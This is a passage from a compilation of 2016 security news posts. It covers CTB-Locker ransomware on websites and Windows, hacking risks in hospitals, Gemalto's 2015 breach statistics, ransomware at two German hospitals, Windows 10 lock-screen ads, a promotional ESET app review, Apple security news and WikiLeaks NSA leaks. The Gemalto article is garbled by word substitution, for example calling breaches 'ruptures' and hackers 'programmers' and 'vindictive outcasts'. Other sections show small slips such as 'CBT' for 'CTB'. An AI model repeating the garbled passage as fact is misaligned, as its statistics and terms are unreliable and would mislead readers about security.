http://studiogreystar.com/access.php
http://a1hose.com/access.php
The ransomware also gives a timeslot for the website administrators to recover the files. However, failure to pay the BTC in time would double the ransom amount by 0.8 BTC.
CTB-Locker for Windows
CTB-Locker for Websites isn't the only latest development with this family of ransomware. The ransomware has come to the Windows environment by using executables code signed with a stolen certificate.
Usually, the purpose of digital signature is to authenticate the public about the genuinity of the products. The certificates are provided only after a background check conducted by the Certificate Authorities (CA) like Verizon, DigiCert.
But the cybercriminal group behind the CTB-Locker ransomware has tampered the genuinity of digital certificates. The executable version in the Windows of the CTB Ransomware comes with a pre-signed digital signature.
Uses Encryptor Raas For Code-Signing Certificate
The group behind CBT believed to had taken the advantage of Jeiphoos, another ransomware developer who lets people go to his "Encryptor RaaS" Tor site that provides free digital signature certificates and sign any executable using stolen code-signing certificate.
The act of stealing digital signatures is not new as they are included in the frames from the past years.
Hijacking a company website would economically affect the services that are being offered to users via websites, elevating the issue to another level. However, the major part lies in the POS (Point of Sale) attack, if the threat infects an e-commercial website.
Currently, many websites had been compromised by "CBT-Locker for Website." As per the analysis, many wordpress sites (most of the static web pages) has been found to be targeted by CBT Website Locker.
Since this is not a serious issue like the Locky ransomware that utilizes Macros, the website administrator can make use of the untouched mirrors (backups) to bring back the site into action.


Securing Hospitals from hackers that can put lives in dangers

27.2.2016 Hacking

Securing Hospitals is a report issued by Independent Security Evaluators that demonstrates how hackers can hack hospitals putting lives in danger.
A group of experts from the Independent Security Evaluators research team have tested the security of hospital networks, demonstrating how it is possible to gain access to critical medical equipment in attacks they say could put lives in danger.

The study was led by healthcare head Geoff Gentry, the results of the test conducted are reported in an interesting paper titled “Securing Hospitals.”

The experts demonstrated that such kind of cyber attacks could put lives in danger, for example hacking patient monitors is possible to display false information which could result in medical responses that injure or kill patients.

They security researchers examined 12 healthcare facilities, two data centres, two web applications, and a couple of live medical devices that could be hacked remotely by threat actors.

“The research results from our assessment of 12 healthcare facilities, 2 healthcare data facilities, 2 active medical devices from one manufacturer, and 2 web applications that remote adversaries can easily deploy attacks that target and compromise patient health. We demonstrated that a variety of deadly remote attacks were possible within these facilities, of which four attack scenarios are presented in this report. ” states the report.

The 71-page document is one of the most interesting study on the level of security of hospitals and the analysis of the resilience of medical devices to cyber attacks.

In the report is detailed a typical attack scenario where a foreign group could launch a cyber attack against the patients of the medical structure triggering vulnerabilities in passive medical devices.

The experts targeted an externally facing web server exploiting its vulnerabilities to gain control of the machine, once inside the network the attackers moved laterally searching for vulnerable devices to compromise.

“On a disconnected network segment, our team demonstrated an authentication bypass attack to gain access to the patient monitor in question, and instructed it to perform a variety of disruptive tasks, such as sounding false alarms, displaying incorrect patient vitals, and disabling the alarm,” the team says in the paper.

Securing Hospitals report - hacking hospitals medical devices

“This attack would have been possible against all medical devices … likely preventing assistance and resulting in the death or serious injury of patients.”

“The attack scenario is harrowing: Diligently executed, many human lives could be at stake, and extrapolating this problem to other hospitals is even more worrisome.”

Patient data could be easily stolen by attackers, attackers for example can exploit a cross-site scripting flaw inside a web application.

The experts dedicated a specific session of their test to cyber attacks relying on USB drives that could be used by hackers as bait. In one of the tests, the team of researchers dropped 18 infected sticks around hospitals, the malware present on the USB sticks allowed them to harvest information from terminals and establish a backdoor inside the systems.

In one case the attackers successfully breached the hospital drug dispensary service.

“At the time of this reporting, we are working to demonstrate that an attack against the particular dispensary is possible, meaning that anyone who can connect to the dispensary can then get access to the configuration interface and manipulate what the device believes it has to be its inventory. If this medication were then given to a patient, it would likely harm or kill the patient.” said the hackers.

The researchers also dedicated great attention to physical security, the team analyzed the presence of exposed hardware device ports and open computers operating in patient rooms, too easy to hack.

“The findings show an industry in turmoil: lack of executive support; insufficient talent; improper implementations of technology; outdated understanding of adversaries; lack of leadership, and a misguided reliance upon compliance,” states the report.

“[It] illustrates our greatest fear: patient health remains extremely vulnerable. One overarching finding of our research is that the industry focuses almost exclusively on the protection of patient health records, and rarely addresses threats to or the protection of patient health from a cyber threat perspective.”

The experts concluded that networks in the Hospitals are often insecure, in many cases the organizations lack of security policies and never audit their systems exposing patients to risk of cyber attacks.

“We found egregious business shortcomings in every hospital, including insufficient funding, insufficient staffing, insufficient training, lack of policy, lack of network awareness, and many more,” researcher Ted Harrington says. “These vulnerabilities are a result of systemic business failures.”

The findings demonstrate that patient health remains extremely vulnerable to cyber attack.


Gemalto Breach Level Index report 2015, what are hackers looking for?

27.2.2016 Hacking

2015 Gemalto Breach Level Index report confirmed the increased interest of threat actors in Government and healthcare data.
As per the security firm Gemalto, Government and healthcare have overwhelmed the retail area as most-focused for information breaks.

An aggregate of 1,673 information ruptures prompted 707 million information records being traded off worldwide amid 2015, as indicated by the most recent release of Gemalto Breach Level Index report.

Gemalto Breach Level Index report

Not all ruptures are just as genuine and the quantity of records revealed is stand out metric. The Gemalto Breach Level Index report endeavors to perceive this by appointing a seriousness score to every rupture (security breach) in view of elements including the sort of information and the quantity of records traded off, the wellspring of the break, and regardless of whether the information was encoded. The philosophy expects to recognize aggravations from high effect mega breaks.

More than 3.6 billion information records have been uncovered following 2013, when Gemalto started benchmarking freely unveiled information breaks. In 2015, vindictive outcasts (ie, programmers) were the main wellspring of these ruptures, representing 964, or 58 percent of breaks and 38 percent of records being compromised. Exposure or coincidental of data records represented 36 percent of all records.

According to the Gemalto Breach Level Index report, the quantity of state-supported assaults represented only 2% of the data breach incidents being reported, yet the quantity of records bargained as an aftereffect of those assaults made up 15 percent of all records uncovered.

The lopsided effect of a little number of breaks is halfway clarified by the high effect rupture at the United States Office of Personnel Management (OPM), which uncovered the individual points of interest of different government workers and released all way of “sensitive” data from historical verifications and related archives. Noxious insiders represented 14 percent of all the data ruptures and only 7% of the traded off (compromised) records.

Regarding geographic areas, 59 per cent reported break mishaps happened in the United States. Europe represented twelve percent of general rupture occurrences, trailed by the Asia Pacific locale at 8%.

Identity theft issue remained the essential kind of break, representing 53 per cent of the data ruptures and 40 percent of all records that were compromised.

Sector of Government represented 43 percent of the compromised/traded off information records, a five-fold increment more than 2014 because of a few substantial information ruptures in the United States and Turkey, and sixteen percent of all the information/data breaks. Healthcare area represented 19 percent of the aggregate records being compromised and 23 percent of all information/data breaks.

By complexity, the retail area saw the quantity of stolen information records dropping 93 per cent year-on-year, so it represented only six percent of stolen records and 10 percent of the aggregate number of ruptures in 2015.

This is in expansive part in light of the fact that 2014 was an especially unpleasant year for data information breaks in the retail division, with issues at Home Depot and others skewing numbers towards the stratosphere. The financial administrations segment likewise saw an almost 99 percent drop, speaking to only 0.1 per cent of the traded off/compromised data records and 15 percent of the aggregate number of ruptures.

They are not attempting to split your ledger – and that is terrible news for you

Criminal programmers in the course of the most recent year or so have moved their concentrate far from conventional card misrepresentation and towards taking individual data in the facilitation of the identity fraud/theft. This change is terrible news for both buyers and organizations alike, as indicated by Gemalto.

Chief technology officer for data protection and Vice President at Gemalto, Jason Hart said,

“In 2014, consumers may have been concerned about having their credit card numbers stolen, but there are built-in protections to limit the financial risks” . “However, in 2015 criminals shifted to attacks on personal information and identity theft, which are much harder to remediate once they are stolen.”

As organizations and gadgets gather continually expanding measures of client data and as purchasers’ online advanced exercises turn out to be more different and productive, more information about what they do, who they are and what they like is at danger to be stolen from the organizations that store their information.

He added, “If consumers’ entire personal data and identities are being co-opted again and again by cyber thieves, trust will increasingly become the centerpiece in the calculus of which companies they do business with”.

Breach-Level-Index-Infographic-2014-FINAL-v2


Ransomware attacks paralyzed at least two German hospitals
27.6.2016 Virus
New ransomware infections hit hospitals in Germany, at least two of them were infected by the dreaded malware.

According to local reports, the systems at two German hospitals were infected by a ransomware, in a similar way occurred recently at the US Hollywood Presbyterian Medical Center.

According to the German broadcaster Deutsche Welle, the German hospitals infected by the ransomware are the Lukas Hospital in the city of Neuss and the Klinikum Arnsberg hospital in North Rhine-Westphalia.

German hospitals infected by malware Lukas Hospital in the city of Neuss

“Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up and running again.” reported the broadcaster.

A few weeks ago, the staff at the Lukas Hospital noticed a progressive deterioration of system performance, while error messages were popping up.

“We then pulled the plug on everything,” spokesperson Dr. Andreas Kremer told DW. “Computers, servers, even the email server, and we went offline.”

The ransomware paralyzed the hospital’s architecture, the incident occurred on February 10, 2016. The internal IT staff will take weeks until everything’s back to normal.

“Our IT department quickly realized that we caught malware that encrypts data. So if the X-ray system wants to access system data, it failed to find it because it’s been encrypted, so it displays an error message,” Kremer said.

The staff at the hospital used phone and fax to communicate with patients, the staff explained that a number of high-risk surgeries have been postponed because of the cyber attack.

The hospital reported the incident to the authorities and to the State Criminal Investigation Office (LKA) which are currently investigating on the case.

“We haven’t received a concrete demand for money, but we’ve seen these pop up windows that appear if you don’t stop the ransomware on a computer,” he told DW. The message in broken English points to an anonymous email address to get in touch with. “Following the Criminal Police Office’s advice, we didn’t do that,” Kremer said.

Fortunately, the IT staff at the hospital makes regular backups of the data.

“We have regular backups, so that isn’t a problem. If the virus encrypted data we have backed up, we just restore the backup files,” Kremer said.

The incident at Klinikum Arnsberg occurred a couple of days later, also in this case the systems were infected by a ransomware that was spread through phishing emails.

In this case, only one of 200 servers was infected by the malware, the IT staff recovered the situation by restoring a working backup.

“According to present knowledge, it was an attachment in an email that allowed the virus to enter the system,” Klinikum Arnsberg spokesperson Richard Bornkeßel told DW. “Fortunately, it was only one server that was affected. The virus had started to encrypt files, but we could simply restore them from a backup,”

Both German hospitals haven’t paid the ransom.


Windows 10 Started Showing Ads on LockScreen — Here's How to Turn It OFF
26.2.2016 OS
If you've upgraded your older version of Windows OS to an all new Windows 10 operating system then you may have noticed an advertisement appearing on your desktop or laptop’s lock screen over the past couple of days.
Yes, this is what Microsoft has chosen to generate revenue after offering Free Windows 10 Download to its users: Monetize the Lock Screen.
Thanks to Windows 10's new Spotlight feature that usually shows you clean and beautiful photographs and fun facts on your lock screen, but now started displaying advertisements to over 200 Million devices running Windows 10.
Some Windows 10 users have reported seeing ads for Rise of the Tomb Raider with links to Windows Store from where users can purchase the video game. Microsoft started selling the game last month.
Although the ads are not as annoying as the Windows 10 privacy concerns related to the way Microsoft collects your personal data, the good news is that you can turn the ads OFF.
Must Read: How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically.
Here's How to Turn the Ads OFF
Disable Windows 10 Lock Screen Advertisement
The advertisements are because of the Windows Spotlight feature in your Personalization settings.
If you don't want to see these intrusive ads, follow the steps given below to disable Windows Spotlight:
Open the Start Menu and look for 'Lock Screen Settings.'
Under 'Background,' Choose either 'Picture' or 'Slideshow,' instead of Windows Spotlight.
Now, Scroll down to 'Get fun facts, tips, tricks, and more on your lock screen' and uncheck this box.
The advertisements are turned ON for your lock screen by default, which is definitely a clever way to offer companies to reach their customers, without mentioning the word 'advertisements' to the Windows users.
windows-10-settings
Also Read: If You Haven't yet, Turn Off Windows 10 Keylogger Now.
As I previously said: Nothing comes for Free, as "Free" is just a relative term. Everything comes with its own price.
As warned last year, Microsoft also started pushing Windows 10 upgrades onto its user's computers much harder by re-categorizing Windows 10 as a "Recommended Update" in Windows Update, instead of an "optional update."


How To Keep Your Android Phone Secure
26.2.2016 Android
As the number of threats is on the rise, Android platform is no longer safe, which isn't a surprise to anyone.
Most of us are usually worried more about the security of our desktops or laptops and forget to think about the consequences our smartphones can make if compromised or stolen.
Unlike desktops, your smartphones and tablets carry all sorts of information from your personal photographs, important emails, messages to your sensitive financial details. And due to rise in mobile usage, the hackers have shifted their interest from desktops to the mobile platform.
Nowadays, nearly all possible threats that were previously attacking desktop platform are now targeting smartphone users.
Ransomware, Phishing, Spams, Spyware, Botnets, Banking Malware, OS and Software vulnerabilities, just to name a few examples, but users don't understand the potential threat when it comes to mobile devices.
Additionally, your smartphones and tablets are also subjectable more threats like, Smartphone Thefts and unnecessary app permissions that allow even legitimate & reputed companies to spy on you.
However, there are a number of solutions to solve all the above issues, but for that, you generally need to install multiple cumbersome and untrusted applications to your mobile devices.
Like a good antivirus to resolve malware and virus issues, an app to manage Android app permissions, a device tracking application in case your device is lost or stolen and lots more and installing all these apps consume lots of space, RAM, the battery of your device.
I frequently receive these types of queries from my readers who ask me for some good solution that could solve most of the security and privacy issues in one go.
So I headed to Google Play Store and started searching for an app that offers a full suite of security and privacy tools. I came across some reputed apps, but they resolve few issues and some apps that address several issues but originate from some vendor I can’t trust.
Then I came across , which comes from one of the reputed antivirus vendors, that is offering protection for all the threats we discussed above.
Anti-Virus Feature with 99.9% Detection Rate
best-mobile-antivirus-app
As its primary role, ESET offers the best antivirus scanning for your smartphone devices with up-to-date threat database and clean mobile app interface.
According to the latest test and review conducted by AV-TEST, an independent lab, ESET mobile security antivirus detects 99.9% of latest threats with the protection and usability score 6 out of 6.
After installing and registering my account, the app's Anti-Virus feature offered me options to have my smartphone scanned periodically:
At specific times, when I’m not using my phone, or
When I plugged in my smartphone for charging
Moving further, I found 3 different levels of scanning available in the software: Quick Scan, Smart Scan, and Deep Scan. So, one can choose to perform any of the options one's feel suitable. I chose Deep Scan that scanned every data and files available on my phone.
ESET Mobile Security also allows to access scan logs easily, and one can also have a look at quarantined items (suspicious files or malware) detected by the anti-virus.
Moreover, the anti-virus feature is also offering a series of advanced antivirus options, including support for ESET Live Grid, detection of potentially unwanted or harmful applications and real-time protection.
Anti-Theft (Remote Lock / Remote Wipe / Locate)
android-anti-theft-app
It is always unfortunate when our expensive mobile device is lost or stolen. Many apps in the market offer device recovery feature via GPS-based tracking, but many times these apps are unable to locate the device. Even if an attacker somehow gets access to the device, it is easy for him/her to uninstall the tracking app.
But, I liked the way works. It is designed to help you easily track your lost or stolen device, and password protects your app so that no one can uninstall it, except you.
All you need to do is:
Set a trusted SIM card within the app.
Provide a trusted number in case of emergency
In the case of lost or stolen, you can log into your ESET account at my.eset.com and track your devices through an easy-to-use web interface and ensure that all your data remains protected from unauthorized users.
As soon as you mark your device as 'Missing' on the online portal, the location of your stolen or lost device will be displayed on a real-time map so that you can easily trace it. You can even view a list of IP addresses that your lost device was connected to.
Bonus — 'Selfies' of Phone Thieves: Marked as Missing devices will automatically capture photographs with its back and front cameras, and then send them to the online portal, which helps you find the location of a missing device easier.
But, What if your stolen device is not connected to the Internet?
Here's How you can Protect Your Smartphone:
Like other apps, ESET Anti-Theft feature lets you send an SMS message command from a trusted number to remotely lock or erase your smartphone data immediately, as well as ringing it in case it has been lost somewhere nearby.
On the top of that, ESET Anti-Theft functionality provides a series of new features, like even if an unauthorized SIM card has been inserted in your stolen smartphone, you can send remote commands to it.
Even if someone tries a wrong PIN or pattern on your smartphone, or insert an unauthorized SIM, your device will be able to take preventive actions on its own in an effort to ensure that your data remains protected.
Device Monitoring and Application Audit:
android-security-app
These features are something that most of us ignore while searching for a good mobile security solution.
Today many apps, even legitimate, request for unnecessary app permissions. Some of your apps can make phone calls, track your location, read your browsing history, contacts, SMS, photos and calendar, and even share this data with third-party advertising companies without your knowledge.
And since I'm security conscious, I always make sure which app is requesting what permissions and for this I found ESET Mobile Security best fit for me.
ESET Mobile Security offers 'Application Audit' feature to help you know what permissions various apps installed on your smartphone or tablet have.
You can click on any app listed in the Application Audit interface, which will land you to your smartphone’s settings menu, from where you can easily restrict unnecessary app permissions or even uninstall it.
Besides this, the app offers you 'Device Monitoring' feature that will help you inform any necessary settings you haven't set correct that could compromise your security.
Anti-Phishing and SMS/MMS/Call Blocker
android-anti-phishing-app
Phishing emails, messages and even contacts are common these days. Hackers or malicious attackers can trick you handing over your sensitive accounts like banking, email or social media accounts access to them.
So, it has become important for us to keep an eye on every email and message that we receive every day, but it’s not as easy as it sounds.
This app resolves the above hurdle as well. ESET's Anti-Phishing feature offers an additional level of protection when you browse the web from your smartphone or tablet.
Though the app doesn't support all browsers currently, you can choose the one that is present on the list of supported browsers to navigate the web.
Besides all the above tools, ESET Mobile Security also offers text messages (SMS), and multimedia messages (MMS) and phone calls blocking capabilities to Android users.
So you can easily opt to simply block calls and messages from all unknown numbers, or more interestingly, all or specific known numbers — with options for both incoming and outgoing blocks.
android-antivirus-security-app
In short, I found ESET Mobile Security a package of security and privacy tools bundled into a single app.
The app is fast, provides a user-friendly interface, keeps you safe from malware, protects against phishing attacks, with numerous other tools to keep your smartphone safe even when it's out of your hands.
However, ESET Mobile Security app doesn't provide any Encrypted Cloud-based Backups, device encryption, which I will like to see in-built in the future.
Overall, ESET Mobile Security for Android is a solid choice for protecting your smartphone or tablet with its top-notch malware protection and huge array of anti-theft and privacy-protection features.
You can download and install app for FREE for a lifetime from the Google Play Store if you are seeking for basic protection capabilities.
However, those seeking for Advanced security and privacy protection on their smartphones should upgrade to a premium subscription, via in-app purchase.


Apple hires developer of World's Most Secure Messaging App
26.2.2016 Apple
Apple is serious this time to enhance its iPhone security that even it can not hack. To achieve this the company has hired one of the key developers of Signal — World's most secure, open source and encrypted messaging app.
Frederic Jacobs, who worked to develop Signal, announced today that he is joining Apple this summer to work as an intern in its CoreOS security team.
"I'm delighted to announce that I accepted an offer to be working with the CoreOS security team at Apple this summer," Jacobs tweeted Thursday.
Signal app is widely popular among the high-profile privacy advocates, security researchers, journalists and whistleblowers for its clean and open source code, and even the NSA whistleblower Edward Snowden uses it every day.
Signal messages are end-to-end encrypted, which means only the sender and the intended recipient can read the messages. Although Apple's iMessage is also end-to-end encrypted, it is not open source.
Apple to build 'Unhackable' Services
The reason behind the Apple's hiring is quite clear as the company is currently fighting a US court order asking Apple to help the FBI unlock iPhone 5C of San Bernardino shooter Syed Farook.
Basically, Apple is deliberately forced to create the special, backdoored version of iOS, so that the Federal Bureau of Investigation (FBI) may be able to Brute Force the passcode on Farook's iPhone without losing the data stored in it.
However, Apple CEO Tim Cook has already refused to provide such a backdoor into the iPhone that would degrade the privacy and security of all iPhone users.
If comply with the court order, the company would be flooded by the FBI and the CIA requests to unlock more iPhones of criminals in near future and the recent request made by the United States government to unlock 12 more iPhones would be just a starter.
But, in an effort to eliminate the chance for government and intelligence agencies for demanding backdoors, the company is removing its own ability to do that, for which they are hiring new interns in its core security team.
Apple found Jacobs a good fit for this, as he had spent two and half years with Open Whisper Systems, the company behind Signal, before leaving the company earlier this year.
Apple to Fully Encrypt iCloud Backups
In San Bernardino shooter's case, Apple admitted that it helped the FBI in every possible way by providing iCloud Backup of Farook, but now…
Apple is working on encrypting iCloud backups that only the account owner would have access, eliminating either way for the government or hackers that could expose its users data.
While creating iCloud backups of users' photos, videos, app data, iMessage, voicemails, SMS, and MMS messages, Apple stores a copy of its users' decryption keys itself that could be provided to authorities when presented with a valid warrant.
But citing some anonymous sources, the Financial Times reports that now Apple will not keep a copy of user's decryption key with it, and the encrypted iCloud backups would only be unlocked by the account holder using her/his passcode.


Discover how many ways there were to hack your Apple TV
26.2.2016 Apple

Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution and information disclosure.
IoT devices are enlarging our attack surface, we are surrounded by devices that manage a huge quantity of information and that could be abused by hackers.

Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution, information disclosure, crash of the application, modifications to protect parts of the filesystem.

This new release of Apple TV version 7.2.1, comes 10 months after the lasted update issued in April 2015. The new version fixes a number of security vulnerabilities in several components of the Apple TV. The company has patched 33 issued, collectively referenced in 58 CVEs, Apple fixed 19 code execution holes that could be exploited with crafted web content.

The changes will be automatically applied to the users that have enabled the automatic updates.

Apple TV hacking

The experts at Apple solved serious security issued residing in the WebKit, the kernel, the third-party app sandbox, Office Viewer, IOKit, ImageIO, FontParser, DiskImages, bootp, CloudKit, and other libraries.

A close look at the list of security holes reveals the presence of a memory corruption flaw (CVE-2015-5776) that could be exploited to by a remote attacker to gain arbitrary code execution or crash applications. Other security vulnerabilities could be triggered by attackers using malicious or malformed DMG files, plists, and apps.

The new release included a series of fixes that Apple has released over the time for other products, the company is spending a significant effort to design a new generation of devices with improved security and that meets strict requirements in term of security.

Recently the company refused to hack into the San Bernardino shooter’s iPhone, and while the dispute with the FBI is going on, it has been reported that Apple is working on a new model that will be impossible to hack.


Wikileaks – NSA tapped world leaders for US geopolitical Interests
26.2.2016 BigBrothers

The NSA tapped world leaders for US Geopolitical Interests, including a conversation between Netanyahu-Berlusconi over the U.S.-Israel Relations.
A couple of days ago the non-profit journalistic organisation WikiLeaks published a collection of highly classified documents that reveals the NSA targeted world leaders for US Geopolitical Interests.

Some of the intercepts are classified TOP-SECRET COMINT-GAMMA, these are most highly classified documents ever published by a media organization.

In particular, one of the documents, reports eavesdropping activities conducted by the US intelligence that spied on the communication between the German Chancellor Angela Merkel and UN Secretary-General Ban Ki-moon on climate change negotiations.

The agents of the National Security Agency have bugged a private climate change strategy meeting between the two politicians held in Berlin.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. The cyber the spies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the UE.

Julian Assange, editor-in-chief at Wikileaks, released the following declaration on Wednesday:

“[it] further demonstrates that the United States’ economic espionage campaign extends to Germany and to key European institutions and issues such as the European Central Bank and the crisis in Greece.” “Would France and Germany have proceeded with the BRICS bailout plan for Greece if this intelligence was not collected and passed to the United States – who must have been horrified at the geopolitical implications?”

wikileaks NSA
The new lot of classified documents also revealed that espionage on the Chief of Staff of UN High Commissioner for Refugees (UNHCR), an activity that was conducted by the US intelligence for a for a long time, the spies intercepted targeting his Swiss phone.

Under the control of the US intelligence there was also the Director of the Rules Division of the World Trade Organisation (WTO), Johann Human, but most interesting cables for the Italian Government are related the espionage of the Prime Minister Silvio Berlusconi.

The interceptions were conducted by the Special Collection Service (SCS), a team of cyber spies operating under diplomatic cover in US embassies and consulates around the world. “Back in 2013, thanks to a Snowden document dated 2010, l’Espresso and la Repubblica revealed how Italy was the only European country, along with Germany, to have two Scs teams on its territory: one in Rome and the other in Milan.

” reported an article published by the Italian L’Espresso.

The documents leaked by Wikileaks confirmed that in March 2010 the US Government has intercepted communications between Italian Prime Minister and the Israeli PM Netanyahu, information disclosed reveals that Berlusconi promised to assist in helping Israel in mending the damaged relationship with the U.S..

The crisis between the United States and Israel was triggered by the announcement of Netanyahu’s plans to build 1,600 houses in East Jerusalem. Berlusconi offered its support to Israel in helping mend the situation.

According to these documents leaked by Assange’s organization, the NSA targeted targeted all the members of the Silvio Berlusconi’s staff, including his personal advisor Valentino Valentini, Berlusconi’s National Security Advisor Bruno Archi, Marco Carnelos, and the Permanent Representative of Italy to the NATO, Stefano Stefanini.

In October 2011, the NSA also intercepted a Valentino Valentini’s top-secret/Noforn document.

Documents confirms the US intelligence also intercepted a critical private meeting between then French president Nicolas Sarkozy, Merkel and Berlusconi, where Sarkozy defined the situation of the Italian banking system as ready to “pop like a cork.”

Which is the position of the Italian Government?

Many Italian security experts are not surprised by these revelations, myself included, from the institutional perspective, it seems that the current Italian Government is ignoring the serious facts.

“The current Italian PM, Matteo Renzi, has essentially ignored the case, whereas the former Italian PM, Enrico Letta, speaking to the Chamber of Deputies in the midst of the most heated phases of the Nsa scandal, declared: «Based on the analysis conducted by our intelligence services and our international contacts, we are not aware that the security of the communications of the Italian government and embassies has been compromised, nor are we aware that the privacy of Italian citizens has been compromised». continues the Expresso.

The Italian government has summoned the American ambassador to Rome following the embarrassing revelations.

The document disclosed by Wikileaks also revealed other operations conducted by the US Intelligence, including the interception of the top EU and Japanese trade ministers.

“Today we proved the UN Secretary General Ban Ki-Moon’s private meetings over how to save the planet from climate change were bugged by a country intent on protecting its largest oil companies. Back in 2010 we revealed that the then US Secretary of State Hillary Clinton had ordered her diplomats to steal the UN leadership’s biometric data and other information. The US government has signed agreements with the UN that it will not engage in such conduct. It will be interesting to see the UN’s reaction, because if the United Nations Secretary General, whose communications and person have legal inviolability, can be repeatedly attacked without consequence then everyone is at risk.” said WikiLeaks editor Julian Assange.